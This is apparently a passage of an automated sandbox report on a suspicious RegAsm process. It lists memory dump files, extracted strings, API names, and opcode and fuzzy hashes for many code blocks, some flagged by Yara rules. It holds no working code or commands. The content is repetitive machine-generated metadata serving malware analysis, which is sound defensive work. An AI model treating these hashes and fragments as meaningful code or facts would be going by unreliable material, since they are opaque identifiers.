                  • Heap block at %p modified at %p past requested size of %lx, xrefs: 024258F7
                  • HEAP: , xrefs: 024258E4
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %lx
                  • API String ID: 0-3722492067
                  • Opcode ID: d892e999413e27ff43d5cc0ac188484476d6d481528717f2c6ea2be6de42f282
                  • Instruction ID: ecc10911b242c28582a2bf9418f7916ba626eb6e4ea2fc18533788281e092a41
                  • Opcode Fuzzy Hash: d892e999413e27ff43d5cc0ac188484476d6d481528717f2c6ea2be6de42f282
                  • Instruction Fuzzy Hash: 54411335610270DFD7689F1BC844AB277E1EF45764BC4888AE8D6CB281D361E89EDB60
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID: *.*$MUI
                  • API String ID: 0-3752369296
                  • Opcode ID: d22152b76dd4e96c9c76bb311c8be1ecdf5920a0f8e4cf0119ede140928d803f
                  • Instruction ID: c2463d68088842bb0509253eda21a2ee9978719f95c1d398dd8fb746da5e40d7
                  • Opcode Fuzzy Hash: d22152b76dd4e96c9c76bb311c8be1ecdf5920a0f8e4cf0119ede140928d803f
                  • Instruction Fuzzy Hash: ACC171359056289ACF71DF28CC88B9AB7B5EF49340F0485DAE849E7251EB709EC4CF51
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID: $
                  • API String ID: 0-227171996
                  • Opcode ID: eceeb7d5a1c837f975b608e4b23f623f79ffd4885533c1e23aee20dd00f88500
                  • Instruction ID: 422fec0b8485e4a7dd858679f55ee5b38a23e9600393a6e2f8501bc12a2121e9
                  • Opcode Fuzzy Hash: eceeb7d5a1c837f975b608e4b23f623f79ffd4885533c1e23aee20dd00f88500
                  • Instruction Fuzzy Hash: 5591F772E001359BDF28DE5BC8802AE7765EB84315B96922FD916DB384DB70E945CBC0
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID: 0-3916222277
                  • Opcode ID: 18274bb6993d1931c624deb04d089df36044bb973dd39cc0db709ebe7e08f763
                  • Instruction ID: 5a9a5cc4dd09d06ed3460fc0fae5be9373c4fafb3c082b2ec35d994fcae7cae4
                  • Opcode Fuzzy Hash: 18274bb6993d1931c624deb04d089df36044bb973dd39cc0db709ebe7e08f763
                  • Instruction Fuzzy Hash: 9CA24772D002699FEF758F64DC81BE9BBB5AB05304F0480EAE64AA7251D7709EC8CF51
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID: #
                  • API String ID: 0-1885708031
                  • Opcode ID: 49d23fa0736eb9b13e4cc7118d2a4b29a21d363a469d48dd762be273e05744b8
                  • Instruction ID: 6d130b7076e877c9fdcfc6b8e6a0837773b52e2d4c8dda40b91c2fbe33e43087
                  • Opcode Fuzzy Hash: 49d23fa0736eb9b13e4cc7118d2a4b29a21d363a469d48dd762be273e05744b8
                  • Instruction Fuzzy Hash: 85426D71D002299BDF25DFD6C980BEEB7B9EF08744F96442BE801B7250DB749989CB60
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID: 8@8
                  • API String ID: 0-222468769
                  • Opcode ID: 52a7b4fd9904778a68f426b789c55f952f178534bf943c7b801e7968525b1fea
                  • Instruction ID: da004c6e441ddb929342d268fa0c8e89f75804bcbf69133a2c55b2c21224526d
                  • Opcode Fuzzy Hash: 52a7b4fd9904778a68f426b789c55f952f178534bf943c7b801e7968525b1fea
                  • Instruction Fuzzy Hash: 0FF17671A00209AFDF26CFA4D841BEEBBB9FF04704F14845AEA15AB692D375D981CF50
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: (
                  • API String ID: 0-3887548279
                  • Opcode ID: efe55a93f843d1d51f45b802f20f375bd025c44f705ea84b73fb0d4c088c8228
                  • Instruction ID: e2177bf2f6bf177b6185ff02d76b684c70491a2ba7975d7b5133c6108a1f1040
                  • Opcode Fuzzy Hash: efe55a93f843d1d51f45b802f20f375bd025c44f705ea84b73fb0d4c088c8228
                  • Instruction Fuzzy Hash: F3021EB6E006199FDB14CF9AC4805DDFBF2FF88314F1AC1AAD859A7315D674AA418F80
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: (
                  • API String ID: 0-3887548279
                  • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                  • Instruction ID: 57d0c58c47acb80735c8798c688933db5418c056c653da714edf416c929f146f
                  • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                  • Instruction Fuzzy Hash: EA021E76E006199FDB14CF9AC4805DDFBF2FF88314F1AC1AAD859A7315D674AA418F80
                  APIs
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID: __aullrem
                  • String ID:
                  • API String ID: 3758378126-0
                  • Opcode ID: 118b915d8d39fe5a3853412fcca9ae1a65cfd75d6746d980f0933ae7f5a1e435
                  • Instruction ID: b7d1b69b4ad1077ce664b2b9bd36e5ec5977c5f9f20a4d50419f7a889aead02d
                  • Opcode Fuzzy Hash: 118b915d8d39fe5a3853412fcca9ae1a65cfd75d6746d980f0933ae7f5a1e435
                  • Instruction Fuzzy Hash: 4C512FB2E1051ADBCF18CFA8C9916BEF7B2BF48314F24852AD525E7340D734AA45CB94
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID: @
                  • API String ID: 0-2766056989
                  • Opcode ID: 600c42c4128534d153913d664ba361b2dfc4ba087e769b52150dd13bcaec01d7
                  • Instruction ID: 45acc53a880c3007594a9c3840f7f16632f642c02724d8dbf7f2cd2197b0fe36
                  • Opcode Fuzzy Hash: 600c42c4128534d153913d664ba361b2dfc4ba087e769b52150dd13bcaec01d7
                  • Instruction Fuzzy Hash: 71D14C71E04229DBDF28CF99C5846BDBBB5FF49318F24842ED912A7641C7349E56CB80
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID: .
                  • API String ID: 0-248832578
                  • Opcode ID: 69ff3c81e3f62699b0581830d46629f13ebb3113df8aa9bcb91a870c2178f61a
                  • Instruction ID: 4e55cc20f1062f7fb2929b4a10daf723c13aca92ca785eb1020da55e25e03b0e
                  • Opcode Fuzzy Hash: 69ff3c81e3f62699b0581830d46629f13ebb3113df8aa9bcb91a870c2178f61a
                  • Instruction Fuzzy Hash: 2AD196B1D00259CBDF22DF94C8807AEF7B2FF08714F51815AD885AB395E774A986CB90
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID: 0-3916222277
                  • Opcode ID: b30784edeb5b6ef5db0ab074e04fc2978bf02b0645849d6257a49662f3bf968a
                  • Instruction ID: 91a4b350a16bfff70bda552637565f908b59a997a52f982fc8f5acddccc59ade
                  • Opcode Fuzzy Hash: b30784edeb5b6ef5db0ab074e04fc2978bf02b0645849d6257a49662f3bf968a
                  • Instruction Fuzzy Hash: 0FA1D172B54359AAEF28CE60EC40BFE77A9AF49304F4404A9F946DA1D1CB74C994CF21
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID: 0-3916222277
                  • Opcode ID: a8012d96f25005f0b74bb2d48f07e53518960ef7b0e66479764d01430dc5a56e
                  • Instruction ID: 33bb613e524c5ee9fb33caf00f8314f52591809dc6191c3397a655cbdcf445cb
                  • Opcode Fuzzy Hash: a8012d96f25005f0b74bb2d48f07e53518960ef7b0e66479764d01430dc5a56e
                  • Instruction Fuzzy Hash: 198119B3E001149BDF68CE59D8957BDF762EF8832CF158229DA16AB6C4D730E941CB80
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: gfff
                  • API String ID: 0-1553575800
                  • Opcode ID: 56ff723c99e0c73d90e11fbf8d858e8a87c76cef532b8f026338fb6a72d228b0
                  • Instruction ID: d58421b9d940760008903e7bfe86dae5d354763b867b157945abca67ee387ae5
                  • Opcode Fuzzy Hash: 56ff723c99e0c73d90e11fbf8d858e8a87c76cef532b8f026338fb6a72d228b0
                  • Instruction Fuzzy Hash: E761BE72B001064BCB2C8E1CCDA56AAB392EBD4315F18827AED19EF3C1E578ED118684
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: st
                  • API String ID: 0-312708591
                  • Opcode ID: 4f51f428fc31099b0df5117cb0a02595c34537deb2850b3a378034b846fa543d
                  • Instruction ID: f94734a7974eaef78ef52ace97df80acae3543267e0ffa9fdedb7695517cc3ca
                  • Opcode Fuzzy Hash: 4f51f428fc31099b0df5117cb0a02595c34537deb2850b3a378034b846fa543d
                  • Instruction Fuzzy Hash: ED517272D011199BDB18CE49C9442AEF7B2EFD4314F298266D415BF3E0E738AE528BC4
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: st
                  • API String ID: 0-312708591
                  • Opcode ID: 0fc5996ccd1e18e9664aea9f1f9f627b55d4293599f63fe616f850e736fd4dd4
                  • Instruction ID: e955f278f926737472b7f4ba6356a1282998f7b55f5ad05d5658b65cbb4d306a
                  • Opcode Fuzzy Hash: 0fc5996ccd1e18e9664aea9f1f9f627b55d4293599f63fe616f850e736fd4dd4
                  • Instruction Fuzzy Hash: BD517432D011198BDB18CE49C9442AEF7B2EFD4314F298266D415BF3E0E738AE568BC4
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 61ec14341a74735974fe97077103804382fd6050ee6aa057a1140086c1d01611
                  • Instruction ID: 1266e05f0e4112f3bb708faf8f73b8257fffd18084019595aca019640b7adce9
                  • Opcode Fuzzy Hash: 61ec14341a74735974fe97077103804382fd6050ee6aa057a1140086c1d01611
                  • Instruction Fuzzy Hash: 3272E572E002299FDF25CF96C841BEEBBF1EF04704F5980AAE905A7381D7799949CB50
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 386d46d65add7f542f0b200e9826e61e151a903ee9f716cc8b9f52616350fe65
                  • Instruction ID: 3a86bebd7ef19e16f523bc3d8b9faa9639074ce8551b5ba2869b06de33a103fa
                  • Opcode Fuzzy Hash: 386d46d65add7f542f0b200e9826e61e151a903ee9f716cc8b9f52616350fe65
                  • Instruction Fuzzy Hash: AF529931A006158FEB29CF58C4807AAB7B2BF89714F3445AAD955DB395DF74E882CB80
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ca69b56d21c09c3f226f8eaaf0822e557caabd1fc4a4f2fe589751ddd7f2c5ec
                  • Instruction ID: 2aab65339ca0d3e28813c966ff50d5cf2e0ba5cd77e8c9d0ca93fe24fb44e2e8
                  • Opcode Fuzzy Hash: ca69b56d21c09c3f226f8eaaf0822e557caabd1fc4a4f2fe589751ddd7f2c5ec
                  • Instruction Fuzzy Hash: 1862A1B280466AEFCF15CF08D4915AEFB72BE55308B45C558C8AB67A44D331BA58CBD0
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 091a500872021f53f0e829899252cc9fcffe020a191e245d432d49e95d708635
                  • Instruction ID: 479988a7a806e3ea07076487728041d847852a7984610faa412461900244cee9
                  • Opcode Fuzzy Hash: 091a500872021f53f0e829899252cc9fcffe020a191e245d432d49e95d708635
                  • Instruction Fuzzy Hash: ED52B1A5904677CBC7108F1AC4800B9BBE2FFF93217598157EC810B3A5E77896A5DBE0
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bf3aace0eee00dd7d8b9421bd2df7728fa7323d9af3e0e213de9131a621edcaa
                  • Instruction ID: 8105c557ab85b7292f4c61937c43d24a40909692a6b6dd5c4a593eb44872254c
                  • Opcode Fuzzy Hash: bf3aace0eee00dd7d8b9421bd2df7728fa7323d9af3e0e213de9131a621edcaa
                  • Instruction Fuzzy Hash: 6C128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
